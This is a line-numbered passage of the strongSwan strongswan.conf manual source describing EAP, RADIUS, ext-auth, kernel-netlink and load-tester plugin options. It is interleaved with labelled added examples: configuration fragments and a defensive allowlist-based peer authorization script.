                    635: Socket provided by the duplicheck plugin.
                    636: 
                    637: .TP
                    638: .BR charon.plugins.eap-aka.request_identity " [yes]"
                    639: .TP
                    640: .BR charon.plugins.eap-aka-3gpp.seq_check " []"
                    641: Enable to activate sequence check of the AKA SQN values in order to trigger
                    642: resync cycles.
                    643: 
                    644: .TP
                    645: .BR charon.plugins.eap-aka-3gpp2.seq_check " []"
                    646: Enable to activate sequence check of the AKA SQN values in order to trigger
                    647: resync cycles.
                    648: 
                    649: .TP
                    650: .BR charon.plugins.eap-dynamic.prefer_user " [no]"
                    651: If enabled the EAP methods proposed in an EAP\-Nak message sent by the peer are
                    652: preferred over the methods registered locally.
                    653: 
                    654: .TP
                    655: .BR charon.plugins.eap-dynamic.preferred " []"
                    656: The preferred EAP method(s) to be used.  If it is not given the first registered
                    657: method will be used initially.  If a comma separated list is given the methods
                    658: are tried in the given order before trying the rest of the registered methods.
                    659: 
                    660: .TP
                    661: .BR charon.plugins.eap-gtc.backend " [pam]"
                    662: XAuth backend to be used for credential verification.
                    663: 
                    664: .TP
                    665: .BR charon.plugins.eap-peap.fragment_size " [1024]"
                    666: Maximum size of an EAP\-PEAP packet.
                    667: 
                    668: .TP
                    669: .BR charon.plugins.eap-peap.include_length " [no]"
                    670: Include length in non\-fragmented EAP\-PEAP packets.
                    671: 
                    672: .TP
                    673: .BR charon.plugins.eap-peap.max_message_count " [32]"
                    674: Maximum number of processed EAP\-PEAP packets (0 = no limit).
                    675: 
                    676: .TP
                    677: .BR charon.plugins.eap-peap.phase2_method " [mschapv2]"
                    678: Phase2 EAP client authentication method.
                    679: 
                    680: .TP
                    681: .BR charon.plugins.eap-peap.phase2_piggyback " [no]"
                    682: Phase2 EAP Identity request piggybacked by server onto TLS Finished message.
                    683: 
                    684: .TP
                    685: .BR charon.plugins.eap-peap.phase2_tnc " [no]"
                    686: Start phase2 EAP TNC protocol after successful client authentication.
                    687: 
                    688: .TP
                    689: .BR charon.plugins.eap-peap.request_peer_auth " [no]"
                    690: Request peer authentication based on a client certificate.
                    691: 
                    692: .TP
                    693: .BR charon.plugins.eap-radius.accounting " [no]"
                    694: Send RADIUS accounting information to RADIUS servers.
                    695: 
                    696: .TP
                    697: .BR charon.plugins.eap-radius.accounting_close_on_timeout " [yes]"
                    698: Close the IKE_SA if there is a timeout during interim RADIUS accounting updates.
                    699: 
                    700: .TP
                    701: .BR charon.plugins.eap-radius.accounting_interval " [0]"
                    702: Interval in seconds for interim RADIUS accounting updates, if not specified by
                    703: the RADIUS server in the Access\-Accept message.
                    704: 
                    705: .TP
                    706: .BR charon.plugins.eap-radius.accounting_requires_vip " [no]"
                    707: If enabled, accounting is disabled unless an IKE_SA has at least one virtual IP.
                    708: Only for IKEv2, for IKEv1 a virtual IP is strictly necessary.
                    709: 
                    710: .TP
                    711: .BR charon.plugins.eap-radius.accounting_send_class " [no]"
                    712: If enabled, adds the Class attributes received in the Access\-Accept message to the
                    713: RADIUS accounting messages.
                    714: 
                    715: .TP
                    716: .BR charon.plugins.eap-radius.class_group " [no]"
                    717: Use the
                    718: .RI "" "class" ""
                    719: attribute sent in the RADIUS\-Accept message as group membership
                    720: information that is compared to the groups specified in the
                    721: .RB "" "rightgroups" ""
                    722: option in
                    723: .RB "" "ipsec.conf" "(5)."
                    724: 
                    725: 
                    726: .TP
                    727: .BR charon.plugins.eap-radius.close_all_on_timeout " [no]"
                    728: Closes all IKE_SAs if communication with the RADIUS server times out. If it is
                    729: not set only the current IKE_SA is closed.
                    730: 
                    731: .TP
                    732: .BR charon.plugins.eap-radius.dae.enable " [no]"
                    733: Enables support for the Dynamic Authorization Extension (RFC 5176).
                    734: 
                    735: .TP
                    736: .BR charon.plugins.eap-radius.dae.listen " [0.0.0.0]"
                    737: Address to listen for DAE messages from the RADIUS server.
                    738: 
                    739: .TP
                    740: .BR charon.plugins.eap-radius.dae.port " [3799]"
                    741: Port to listen for DAE requests.
                    742: 
                    743: .TP
                    744: .BR charon.plugins.eap-radius.dae.secret " []"
                    745: Shared secret used to verify/sign DAE messages. If set, make sure to adjust the
                    746: permissions of the config file accordingly.
                    747: 
                    748: .TP
                    749: .BR charon.plugins.eap-radius.eap_start " [no]"
                    750: Send EAP\-Start instead of EAP\-Identity to start RADIUS conversation.
                    751: 
                    752: .TP
                    753: .BR charon.plugins.eap-radius.filter_id " [no]"
                    754: If the RADIUS
                    755: .RI "" "tunnel_type" ""
                    756: attribute with value
                    757: .RB "" "ESP" ""
                    758: is received, use the
                    759: .RI "" "filter_id" ""
                    760: attribute sent in the RADIUS\-Accept message as group membership
                    761: information that is compared to the groups specified in the
                    762: .RB "" "rightgroups" ""
                    763: option in
                    764: .RB "" "ipsec.conf" "(5)."
                    765: 
                    766: 
                    767: .TP
                    768: .BR charon.plugins.eap-radius.forward.ike_to_radius " []"
                    769: RADIUS attributes to be forwarded from IKEv2 to RADIUS (can be defined by name
                    770: or attribute number, a colon can be used to specify vendor\-specific attributes,
                    771: e.g. Reply\-Message, or 11, or 36906:12).
                    772: 
                    773: .TP
                    774: .BR charon.plugins.eap-radius.forward.radius_to_ike " []"
                    775: Same as
                    776: .RI "" "charon.plugins.eap\-radius.forward.ike_to_radius" ""
                    777: but from RADIUS to
                    778: IKEv2, a strongSwan specific private notify (40969) is used to transmit the
                    779: attributes.
                    780: 
                    781: .TP
                    782: .BR charon.plugins.eap-radius.id_prefix " []"
                    783: Prefix to EAP\-Identity; some AAA servers use an IMSI prefix to select the EAP
                    784: method.
                    785: 
                    786: .TP
                    787: .BR charon.plugins.eap-radius.nas_identifier " [strongSwan]"
                    788: NAS\-Identifier to include in RADIUS messages.
                    789: 
                    790: .TP
                    791: .BR charon.plugins.eap-radius.port " [1812]"
                    792: Port of RADIUS server (authentication).
                    793: 
                    794: .TP
                    795: .BR charon.plugins.eap-radius.retransmit_base " [1.4]"
                    796: Base to use for calculating exponential back off.
                    797: 
                    798: .TP
                    799: .BR charon.plugins.eap-radius.retransmit_timeout " [2.0]"
                    800: Timeout in seconds before sending first retransmit.
                    801: 
                    802: .TP
                    803: .BR charon.plugins.eap-radius.retransmit_tries " [4]"
                    804: Number of times to retransmit a packet before giving up.
                    805: 
                    806: .TP
                    807: .BR charon.plugins.eap-radius.secret " []"
                    808: Shared secret between RADIUS and NAS. If set, make sure to adjust the
                    809: permissions of the config file accordingly.
                    810: 
                    811: .TP
                    812: .BR charon.plugins.eap-radius.server " []"
                    813: IP/Hostname of RADIUS server.
                    814: 
                    815: .TP
                    816: .B charon.plugins.eap-radius.servers
                    817: .br
                    818: Section to specify multiple RADIUS servers. The
                    819: .RB "" "nas_identifier" ","
                    820: .RB "" "secret" ","
                    821: .RB "" "sockets" ""
                    822: and
                    823: .RB "" "port" ""
                    824: (or
                    825: .RB "" "auth_port" ")"
                    826: options can be specified for each
                    827: server. A server's IP/Hostname can be configured using the
                    828: .RB "" "address" ""
                    829: option.
                    830: The
                    831: .RB "" "acct_port" ""
                    832: [1813] option can be used to specify the port used for RADIUS
                    833: accounting. For each RADIUS server a priority can be specified using the
                    834: .RB "" "preference" ""
                    835: [0] option. The retransmission time for each server can be set
                    836: using
                    837: .RB "" "retransmit_base" ","
                    838: .RB "" "retransmit_timeout" ""
                    839: and
                    840: .RB "" "retransmit_tries" "."
                    841: 
                    842: 
                    843: .TP
                    844: .BR charon.plugins.eap-radius.sockets " [1]"
                    845: Number of sockets (ports) to use, increase for high load.
                    846: 
                    847: .TP
                    848: .BR charon.plugins.eap-radius.station_id_with_port " [yes]"
                    849: Whether to include the UDP port in the Called\- and Calling\-Station\-Id RADIUS
                    850: attributes.
                    851: 
                    852: .TP
                    853: .B charon.plugins.eap-radius.xauth
                    854: .br
                    855: Section to configure multiple XAuth authentication rounds via RADIUS. The
                    856: subsections define so\-called authentication profiles with arbitrary names. In
                    857: each profile section one or more XAuth types can be configured, with an assigned
                    858: message. For each type a separate XAuth exchange will be initiated and all
                    859: replies get concatenated into the User\-Password attribute, which then gets
                    860: verified over RADIUS.
                    861: 
                    862: Available XAuth types are
                    863: .RB "" "password" ","
                    864: .RB "" "passcode" ","
                    865: .RB "" "nextpin" ","
                    866: and
                    867: .RB "" "answer" "."
                    868: This type is not relevant to strongSwan or the AAA server, but the
                    869: client may show a different dialog (along with the configured message).
                    870: 
                    871: To use the configured profiles, they have to be configured in the respective
                    872: connection in
                    873: .RB "" "ipsec.conf" "(5)"
                    874: by appending the profile name, separated by a
                    875: colon, to the
                    876: .RB "" "xauth\-radius" ""
                    877: XAuth backend configuration in
                    878: .RI "" "rightauth" ""
                    879: or
                    880: .RI "" "rightauth2" ","
                    881: for instance,
                    882: .RI "" "rightauth2=xauth\-radius:profile" "."
                    883: 
                    884: 
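As an added example (not part of strongSwan's own documentation), here is a strongswan.conf fragment that combines the servers section and the xauth profile section described above. The nesting follows the dotted option names used on this page (charon.plugins.eap-radius.servers.<name>.<option>); the addresses, the server and profile names, the prompt messages and the secret placeholders are constructed for illustration.

```conf
# Two RADIUS servers, each with its own secret and priority, and one XAuth
# profile that runs two authentication rounds. Because this file then carries
# shared secrets, restrict its permissions (root-only read) as the option
# descriptions above advise.
charon {
    plugins {
        eap-radius {
            # Global values; the per-server settings below take precedence.
            nas_identifier = vpn-gw.example.net
            accounting = yes
            servers {
                primary {
                    address = 192.0.2.10
                    auth_port = 1812
                    acct_port = 1813
                    secret = REPLACE_WITH_PRIMARY_SECRET
                    # priority value, see the preference option above
                    preference = 10
                    sockets = 4
                    retransmit_base = 1.4
                    retransmit_timeout = 2.0
                    retransmit_tries = 4
                }
                backup {
                    address = radius-backup.example.net
                    secret = REPLACE_WITH_BACKUP_SECRET
                    preference = 0
                }
            }
            xauth {
                # Profile "pinpass": one XAuth exchange per type; both replies
                # are concatenated into User-Password and verified over RADIUS.
                pinpass {
                    password = Enter your password
                    passcode = Enter your token code
                }
            }
        }
    }
}
```

The profile is then selected per connection in ipsec.conf(5) as described above, for instance rightauth2=xauth\-radius:pinpass.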
                    885: .TP
                    886: .BR charon.plugins.eap-sim.request_identity " [yes]"
                    887: .TP
                    888: .BR charon.plugins.eap-simaka-sql.database " []"
                    889: .TP
                    890: .BR charon.plugins.eap-simaka-sql.remove_used " [no]"
                    891: .TP
                    892: .BR charon.plugins.eap-tls.fragment_size " [1024]"
                    893: Maximum size of an EAP\-TLS packet.
                    894: 
                    895: .TP
                    896: .BR charon.plugins.eap-tls.include_length " [yes]"
                    897: Include length in non\-fragmented EAP\-TLS packets.
                    898: 
                    899: .TP
                    900: .BR charon.plugins.eap-tls.max_message_count " [32]"
                    901: Maximum number of processed EAP\-TLS packets (0 = no limit).
                    902: 
                    903: .TP
                    904: .BR charon.plugins.eap-tnc.max_message_count " [10]"
                    905: Maximum number of processed EAP\-TNC packets (0 = no limit).
                    906: 
                    907: .TP
                    908: .BR charon.plugins.eap-tnc.protocol " [tnccs-2.0]"
                    909: IF\-TNCCS protocol version to be used 
                    910: .RI "(" "tnccs\-1.1" ","
                    911: .RI "" "tnccs\-2.0" ","
                    912: .RI "" "tnccs\-dynamic" ")."
                    913: 
                    914: 
                    915: .TP
                    916: .BR charon.plugins.eap-ttls.fragment_size " [1024]"
                    917: Maximum size of an EAP\-TTLS packet.
                    918: 
                    919: .TP
                    920: .BR charon.plugins.eap-ttls.include_length " [yes]"
                    921: Include length in non\-fragmented EAP\-TTLS packets.
                    922: 
                    923: .TP
                    924: .BR charon.plugins.eap-ttls.max_message_count " [32]"
                    925: Maximum number of processed EAP\-TTLS packets (0 = no limit).
                    926: 
                    927: .TP
                    928: .BR charon.plugins.eap-ttls.phase2_method " [md5]"
                    929: Phase2 EAP client authentication method.
                    930: 
                    931: .TP
                    932: .BR charon.plugins.eap-ttls.phase2_piggyback " [no]"
                    933: Phase2 EAP Identity request piggybacked by server onto TLS Finished message.
                    934: 
                    935: .TP
                    936: .BR charon.plugins.eap-ttls.phase2_tnc " [no]"
                    937: Start phase2 EAP TNC protocol after successful client authentication.
                    938: 
                    939: .TP
                    940: .BR charon.plugins.eap-ttls.phase2_tnc_method " [pt]"
                    941: Phase2 EAP TNC transport protocol
                    942: .RI "(" "pt" ""
                    943: as IETF standard or legacy
                    944: .RI "" "tnc" ")."
                    945: 
                    946: 
                    947: .TP
                    948: .BR charon.plugins.eap-ttls.request_peer_auth " [no]"
                    949: Request peer authentication based on a client certificate.
                    950: 
                    951: .TP
                    952: .BR charon.plugins.error-notify.socket " [unix://${piddir}/charon.enfy]"
                    953: Socket provided by the error\-notify plugin.
                    954: 
                    955: .TP
                    956: .BR charon.plugins.ext-auth.script " []"
                    957: Command to pass to the system shell for peer authorization. Authorization is
                    958: considered successful if the command executes normally with an exit code of
                    959: zero. For all other exit codes IKE_SA authorization is rejected.
                    960: 
                    961: The following environment variables get passed to the script:
                    962: .RI "" "IKE_UNIQUE_ID" ":"
                    963: The IKE_SA numerical unique identifier.
                    964: .RI "" "IKE_NAME" ":"
                    965: The peer configuration
                    966: connection name.
                    967: .RI "" "IKE_LOCAL_HOST" ":"
                    968: Local IKE IP address.
                    969: .RI "" "IKE_REMOTE_HOST" ":"
                    970: Remote IKE IP address.
                    971: .RI "" "IKE_LOCAL_ID" ":"
                    972: Local IKE identity.
                    973: .RI "" "IKE_REMOTE_ID" ":"
                    974: Remote IKE identity.
                    975: .RI "" "IKE_REMOTE_EAP_ID" ":"
                    976: Remote EAP or XAuth identity, if used.
                    977: 
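As an added example (not shipped with strongSwan), the following is a minimal authorization script of the kind that could be named in charon.plugins.ext-auth.script. It consumes the environment variables listed above and authorizes the IKE_SA only if the peer identity is on an allowlist; the allowlist path, its one-identity-per-line format and the EXT_AUTH_ALLOWLIST override are assumptions of this example. Since charon executes the command in its own context, the script and the allowlist should be writable by root only.

```shell
#!/bin/sh
# Added example, not part of strongSwan: a peer authorization script for
# charon.plugins.ext-auth.script. charon passes the command to the system
# shell with the IKE_* variables described above in its environment; exit
# status 0 authorizes the IKE_SA, any other status rejects it.
# The allowlist file path and its one-identity-per-line format are this
# example's own assumptions, not something strongSwan defines.

ALLOWLIST="${EXT_AUTH_ALLOWLIST:-/etc/strongswan.d/ext-auth.allow}"  # assumed path

# valid_identity ID: succeed only if ID is non-empty, at most 255 characters
# and made of printable characters only (no newlines or other control
# characters that could confuse line-oriented matching or log parsing).
valid_identity() {
    _id="$1"
    [ -n "$_id" ] || return 1
    [ "${#_id}" -le 255 ] || return 1
    case "$_id" in
        *[![:print:]]*) return 1 ;;
    esac
    return 0
}

# identity_allowed ID FILE: succeed if ID appears as a whole line in FILE.
# -F treats ID as a fixed string and -x requires a whole-line match, so an
# identity such as "*@example.org" is compared literally, not as a pattern.
# An unreadable allowlist fails closed.
identity_allowed() {
    _id="$1"
    _list="$2"
    [ -r "$_list" ] || return 2
    grep -F -x -q -- "$_id" "$_list"
}

# authorize_peer REMOTE_ID EAP_ID FILE: decide for one IKE_SA. When an EAP or
# XAuth identity was used, that is the identity the authentication exchange
# verified, so it takes precedence over the IKE identity the client presented.
authorize_peer() {
    _remote="$1"
    _eap="$2"
    _file="$3"
    if [ -n "$_eap" ]; then
        _subject="$_eap"
    else
        _subject="$_remote"
    fi
    valid_identity "$_subject" || return 1
    identity_allowed "$_subject" "$_file" || return 1
    return 0
}

# Entry point when run by charon, which always sets IKE_UNIQUE_ID. Loading the
# file without it (as in a test) only defines the functions above.
if [ -n "${IKE_UNIQUE_ID:-}" ]; then
    # Strip non-printable bytes before logging so a hostile identity cannot
    # inject fake log lines.
    _peer=$(printf '%s' "IKE_SA ${IKE_UNIQUE_ID} (${IKE_NAME:-?}) ${IKE_REMOTE_HOST:-?} id=${IKE_REMOTE_ID:-?}" | tr -cd '[:print:]')
    if authorize_peer "${IKE_REMOTE_ID:-}" "${IKE_REMOTE_EAP_ID:-}" "$ALLOWLIST"; then
        logger -t ext-auth -- "$_peer: authorized"
        exit 0
    fi
    logger -t ext-auth -- "$_peer: rejected"
    exit 1
fi
```

The whole-line fixed-string match is deliberate: distinguished names such as "C=CH, O=strongSwan, CN=dave" contain characters that would be special to a regular expression, and a prefix match would let "carol" authorize "carol@strongswan.org" and anything else that starts with it.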
                    978: .TP
                    979: .BR charon.plugins.forecast.groups " [224.0.0.1,224.0.0.22,224.0.0.251,224.0.0.252,239.255.255.250]"
                    980: Comma separated list of multicast groups to join locally. The local host
                    981: receives and forwards packets in the local LAN for joined multicast groups only.
                    982: Packets matching the list of multicast groups get forwarded to connected
                    983: clients. The default group includes host multicasts, IGMP, mDNS, LLMNR and
                    984: SSDP/WS\-Discovery, and is usually a good choice for Windows clients.
                    985: 
                    986: .TP
                    987: .BR charon.plugins.forecast.interface " []"
                    988: Name of the local interface to listen on for broadcast messages to forward. If no
                    989: interface is configured, the first usable interface is used, which is usually
                    990: just fine for single\-homed hosts. If your host has multiple interfaces, set this
                    991: option to the local LAN interface you want to forward broadcasts from/to.
                    992: 
                    993: .TP
                    994: .BR charon.plugins.forecast.reinject " []"
                    995: Comma separated list of CHILD_SA configuration names for which to perform
                    996: multi/broadcast reinjection. For clients connecting over such a configuration,
                    997: any multi/broadcast received over the tunnel gets reinjected to all active
                    998: tunnels. This makes the broadcasts visible to other peers, and for example
                    999: allows clients to see each other's shares. If disabled, multi/broadcast messages
                   1000: received over a tunnel are injected to the local network only, but not to other
                   1001: IPsec clients.
                   1002: 
                   1003: .TP
                   1004: .BR charon.plugins.gcrypt.quick_random " [no]"
                   1005: Use faster random numbers in gcrypt; for testing only, produces weak keys!
                   1006: 
                   1007: .TP
                   1008: .BR charon.plugins.ha.autobalance " [0]"
                   1009: Interval in seconds to automatically balance handled segments between nodes. Set
                   1010: to 0 to disable.
                   1011: 
                   1012: .TP
                   1013: .BR charon.plugins.ha.fifo_interface " [yes]"
                   1014: .TP
                   1015: .BR charon.plugins.ha.heartbeat_delay " [1000]"
                   1016: .TP
                   1017: .BR charon.plugins.ha.heartbeat_timeout " [2100]"
                   1018: .TP
                   1019: .BR charon.plugins.ha.local " []"
                   1020: .TP
                   1021: .BR charon.plugins.ha.monitor " [yes]"
                   1022: .TP
                   1023: .BR charon.plugins.ha.pools " []"
                   1024: .TP
                   1025: .BR charon.plugins.ha.remote " []"
                   1026: .TP
                   1027: .BR charon.plugins.ha.resync " [yes]"
                   1028: .TP
                   1029: .BR charon.plugins.ha.secret " []"
                   1030: .TP
                   1031: .BR charon.plugins.ha.segment_count " [1]"
                   1032: .TP
                   1033: .BR charon.plugins.ipseckey.enable " [no]"
                   1034: Enable fetching of IPSECKEY RRs via DNS.
                   1035: 
                   1036: .TP
                   1037: .BR charon.plugins.kernel-libipsec.allow_peer_ts " [no]"
                   1038: Allow a remote traffic selector that equals the IKE peer. The route installed
                   1039: for such traffic (via TUN device) usually prevents further IKE traffic. The
                   1040: fwmark options for the
                   1041: .RI "" "kernel\-netlink" ""
                   1042: and
                   1043: .RI "" "socket\-default" ""
                   1044: plugins can be used
                   1045: to circumvent that problem.
                   1046: 
                   1047: .TP
                   1048: .BR charon.plugins.kernel-netlink.buflen " [<min(PAGE_SIZE, 8192)>]"
                   1049: Buffer size for received Netlink messages.
                   1050: 
                   1051: .TP
                   1052: .BR charon.plugins.kernel-netlink.force_receive_buffer_size " [no]"
                   1053: If the maximum Netlink socket receive buffer in bytes set by
                   1054: .RI "" "receive_buffer_size" ""
                   1055: exceeds the system\-wide maximum from
                   1056: /proc/sys/net/core/rmem_max, this option can be used to override the limit.
                   1057: Enabling this option requires special privileges (CAP_NET_ADMIN).
                   1058: 
                   1059: .TP
                   1060: .BR charon.plugins.kernel-netlink.fwmark " []"
                   1061: Firewall mark to set on the routing rule that directs traffic to our routing
                   1062: table. The format is [!]mark[/mask], where the optional exclamation mark inverts
                   1063: the meaning (i.e. the rule only applies to packets that don't match the mark).
                   1064: 
                   1065: .TP
                   1066: .BR charon.plugins.kernel-netlink.hw_offload_feature_interface " [lo]"
                   1067: If the kernel supports hardware offloading, the plugin needs to find the feature
                   1068: flag which represents hardware offloading support for network devices. Using the
                   1069: loopback device for this purpose is usually fine, since it should always be
                   1070: present. For rare cases in which the loopback device cannot be used to obtain
                   1071: the appropriate feature flag, this option can be used to specify an alternative
                   1072: interface for offload feature detection.
                   1073: 
                   1074: .TP
                   1075: .BR charon.plugins.kernel-netlink.ignore_retransmit_errors " [no]"
                   1076: Whether to ignore errors potentially resulting from a retransmission.
                   1077: 
                   1078: .TP
                   1079: .BR charon.plugins.kernel-netlink.mss " [0]"
                   1080: MSS to set on installed routes, 0 to disable.
                   1081: 
                   1082: .TP
                   1083: .BR charon.plugins.kernel-netlink.mtu " [0]"
                   1084: MTU to set on installed routes, 0 to disable.
                   1085: 
                   1086: .TP
                   1087: .BR charon.plugins.kernel-netlink.parallel_route " [no]"
                   1088: Whether to perform concurrent Netlink ROUTE queries on a single socket. While
                   1089: parallel queries can improve throughput, they have more overhead. On vanilla Linux,
                   1090: DUMP queries fail with EBUSY and must be retried, further decreasing
                   1091: performance.
                   1092: 
                   1093: .TP
                   1094: .BR charon.plugins.kernel-netlink.parallel_xfrm " [no]"
                   1095: Whether to perform concurrent Netlink XFRM queries on a single socket.
                   1096: 
                   1097: .TP
                   1098: .BR charon.plugins.kernel-netlink.policy_update " [no]"
                   1099: Whether to always use XFRM_MSG_UPDPOLICY to install policies.
                   1100: 
                   1101: .TP
                   1102: .BR charon.plugins.kernel-netlink.port_bypass " [no]"
                   1103: Whether to use port or socket based IKE XFRM bypass policies. IKE bypass
                   1104: policies are used to exempt IKE traffic from XFRM processing. The default socket
                   1105: based policies are directly tied to the IKE UDP sockets, port based policies use
                   1106: global XFRM bypass policies for the used IKE UDP ports.
                   1107: 
                   1108: .TP
                   1109: .BR charon.plugins.kernel-netlink.process_rules " [no]"
                   1110: Whether to process changes in routing rules to trigger roam events. This is
                   1111: currently only useful if the kernel based route lookup is used (i.e. if route
                   1112: installation is disabled or an inverted fwmark match is configured).
                   1113: 
                   1114: .TP
                   1115: .BR charon.plugins.kernel-netlink.receive_buffer_size " [0]"
                   1116: Maximum Netlink socket receive buffer in bytes. This value controls how many
                   1117: bytes of Netlink messages can be received on a Netlink socket. The default value
                   1118: is set by /proc/sys/net/core/rmem_default. The specified value cannot exceed the
                   1119: system\-wide maximum from /proc/sys/net/core/rmem_max, unless
                   1120: .RI "" "force_receive_buffer_size" ""
                   1121: is enabled.
                   1122: 
                   1123: .TP
                   1124: .BR charon.plugins.kernel-netlink.retries " [0]"
                   1125: Number of Netlink message retransmissions to send on timeout.
                   1126: 
                   1127: .TP
                   1128: .BR charon.plugins.kernel-netlink.roam_events " [yes]"
                   1129: Whether to trigger roam events when interfaces, addresses or routes change.
                   1130: 
                   1131: .TP
                   1132: .BR charon.plugins.kernel-netlink.set_proto_port_transport_sa " [no]"
                   1133: Whether to set protocol and ports in the selector installed on transport mode
                   1134: IPsec SAs in the kernel. While doing so enforces policies for inbound traffic,
                   1135: it also prevents the use of a single IPsec SA by more than one traffic selector.
                   1136: 
                   1137: .TP
                   1138: .B charon.plugins.kernel-netlink.spdh_thresh
                   1139: .br
                   1140: XFRM policy hashing threshold configuration for IPv4 and IPv6.
                   1141: 
                   1142: The section defines hashing thresholds to configure in the kernel during daemon
                   1143: startup. Each address family takes a threshold for the local subnet of an IPsec
                   1144: policy (src in out\-policies, dst in in\- and forward\-policies) and the remote
                   1145: subnet (dst in out\-policies, src in in\- and forward\-policies).
                   1146: 
                   1147: If the subnet's prefix length is greater than or equal to the threshold, the
                   1148: first threshold bits are used to calculate a hash to look up the policy.
                   1149: 
                   1150: Policy hashing thresholds are not supported before Linux 3.18 and might conflict
                   1151: with socket policies before Linux 4.8.
                   1152: 
                   1153: .TP
                   1154: .BR charon.plugins.kernel-netlink.spdh_thresh.ipv4.lbits " [32]"
                   1155: Local subnet XFRM policy hashing threshold for IPv4.
                   1156: 
                   1157: .TP
                   1158: .BR charon.plugins.kernel-netlink.spdh_thresh.ipv4.rbits " [32]"
                   1159: Remote subnet XFRM policy hashing threshold for IPv4.
                   1160: 
                   1161: .TP
                   1162: .BR charon.plugins.kernel-netlink.spdh_thresh.ipv6.lbits " [128]"
                   1163: Local subnet XFRM policy hashing threshold for IPv6.
                   1164: 
                   1165: .TP
                   1166: .BR charon.plugins.kernel-netlink.spdh_thresh.ipv6.rbits " [128]"
                   1167: Remote subnet XFRM policy hashing threshold for IPv6.
                   1168: 
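To make the section layout concrete, the following strongswan.conf fragment is an added example, not part of this page or of strongSwan's own documentation. The values are illustrative and assume a gateway whose policies mostly carry /24 (IPv4) and /64 (IPv6) remote subnets behind a single local address.

```conf
# Added example, not from strongswan.conf(5). Values are assumptions for a
# gateway with many /24 and /64 remote subnets and a single local address.
charon {
    plugins {
        kernel-netlink {
            spdh_thresh {
                ipv4 {
                    # local side keeps the default: only /32 hosts are hashed
                    lbits = 32
                    # remote subnets of /24 or longer are hashed on their
                    # first 24 bits; anything shorter (e.g. /16) is not hashed
                    rbits = 24
                }
                ipv6 {
                    lbits = 128
                    rbits = 64
                }
            }
        }
    }
}
```

The thresholds are written to the kernel only at daemon startup, so changing them needs a restart of charon. On kernels older than 3.18 the section has no effect, and on kernels between 3.18 and 4.8 it may conflict with the socket based IKE bypass policies described under port_bypass above; on such kernels either keep the defaults or test carefully with port_bypass = yes. Outside charon the same kernel setting is reachable via iproute2 as ip xfrm policy set hthresh4 LBITS RBITS hthresh6 LBITS RBITS.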
                   1169: .TP
                   1170: .BR charon.plugins.kernel-netlink.timeout " [0]"
                   1171: Netlink message retransmission timeout, 0 to disable retransmissions.
                   1172: 
                   1173: .TP
                   1174: .BR charon.plugins.kernel-netlink.xfrm_acq_expires " [165]"
                   1175: Lifetime of XFRM acquire state created by the kernel when traffic matches a trap
                   1176: policy. The value gets written to /proc/sys/net/core/xfrm_acq_expires.
                   1177: Indirectly controls the delay between XFRM acquire messages triggered by the
                   1178: kernel for a trap policy. The same value is used as timeout for SPIs allocated
                   1179: by the kernel. The default value equals the total retransmission timeout for
                   1180: IKE messages, see IKEv2 RETRANSMISSION in
                   1181: .RB "" "strongswan.conf" "(5)."
                   1182: 
                   1183: 
                   1184: .TP
                   1185: .BR charon.plugins.kernel-pfkey.events_buffer_size " [0]"
                   1186: Size of the receive buffer for the event socket (0 for default size). Because
                   1187: events are received asynchronously installing e.g. lots of policies may require
                   1188: a larger buffer than the default on certain platforms in order to receive all
                   1189: messages.
                   1190: 
                   1191: .TP
                   1192: .BR charon.plugins.kernel-pfkey.route_via_internal " [no]"
                   1193: Whether to use the internal or external interface in installed routes. The
                   1194: internal interface is the one where the IP address contained in the local
                   1195: traffic selector is located, the external interface is the one over which the
                   1196: destination address of the IPsec tunnel can be reached. This is not relevant if
                   1197: virtual IPs are used, for which a TUN device is created that's used in the
                   1198: routes.
                   1199: 
                   1200: .TP
                   1201: .BR charon.plugins.kernel-pfroute.vip_wait " [1000]"
                   1202: Time in ms to wait until virtual IP addresses appear/disappear before failing.
                   1203: 
                   1204: .TP
                   1205: .BR charon.plugins.led.activity_led " []"
                   1206: .TP
                   1207: .BR charon.plugins.led.blink_time " [50]"
                   1208: .TP
                   1209: .B charon.plugins.load-tester
                   1210: .br
                   1211: Section to configure the load\-tester plugin, see LOAD TESTS in
                   1212: .RB "" "strongswan.conf" "(5)"
                   1213: for details.
                   1214: 
                   1215: .TP
                   1216: .B charon.plugins.load-tester.addrs
                   1217: .br
                   1218: Section that contains key/value pairs with address pools (in CIDR notation) to
                   1219: use for a specific network interface e.g. eth0 = 10.10.0.0/16.
                   1220: 
                   1221: .TP
                   1222: .BR charon.plugins.load-tester.addrs_keep " [no]"
                   1223: Whether to keep dynamic addresses even after the associated SA got terminated.
                   1224: 
                   1225: .TP
                   1226: .BR charon.plugins.load-tester.addrs_prefix " [16]"
                   1227: Network prefix length to use when installing dynamic addresses. If set to \-1 the
                   1228: full address is used (i.e. 32 or 128).
                   1229: 
                   1230: .TP
                   1231: .BR charon.plugins.load-tester.ca_dir " []"
                   1232: Directory to load (intermediate) CA certificates from.
                   1233: 
                   1234: .TP
                   1235: .BR charon.plugins.load-tester.child_rekey " [600]"
                   1236: Seconds to start CHILD_SA rekeying after setup.
                   1237: 
                   1238: .TP
                   1239: .BR charon.plugins.load-tester.crl " []"
                   1240: URI to a CRL to include as certificate distribution point in generated
                   1241: certificates.
                   1242: 
                   1243: .TP
                   1244: .BR charon.plugins.load-tester.delay " [0]"
                   1245: Delay between initiations for each thread.
                   1246: 
                   1247: .TP
                   1248: .BR charon.plugins.load-tester.delete_after_established " [no]"
                   1249: Delete an IKE_SA as soon as it has been established.
                   1250: 
                   1251: .TP
                   1252: .BR charon.plugins.load-tester.digest " [sha1]"
                   1253: Digest algorithm used when issuing certificates.
                   1254: 
                   1255: .TP
                   1256: .BR charon.plugins.load-tester.dpd_delay " [0]"
                   1257: DPD delay to use in load test.
                   1258: 
                   1259: .TP
                   1260: .BR charon.plugins.load-tester.dynamic_port " [0]"
                   1261: Base port to be used for requests (each client uses a different port).
                   1262: 
                   1263: .TP
                   1264: .BR charon.plugins.load-tester.eap_password " [default-pwd]"
                   1265: EAP secret to use in load test.
                   1266: 
                   1267: .TP
                   1268: .BR charon.plugins.load-tester.enable " [no]"
                   1269: Enable the load testing plugin.
                   1270: .RB "" "WARNING" ":"
                   1271: Never enable this plugin on
                   1272: productive systems. It provides preconfigured credentials and allows an attacker
                   1273: to authenticate as any user.
                   1274: 
                   1275: .TP
                   1276: .BR charon.plugins.load-tester.esp " [aes128-sha1]"
                   1277: CHILD_SA proposal to use for load tests.
                   1278: 
                   1279: .TP
                   1280: .BR charon.plugins.load-tester.fake_kernel " [no]"
                   1281: Fake the kernel interface to allow load\-testing against self.
                   1282: 
                   1283: .TP
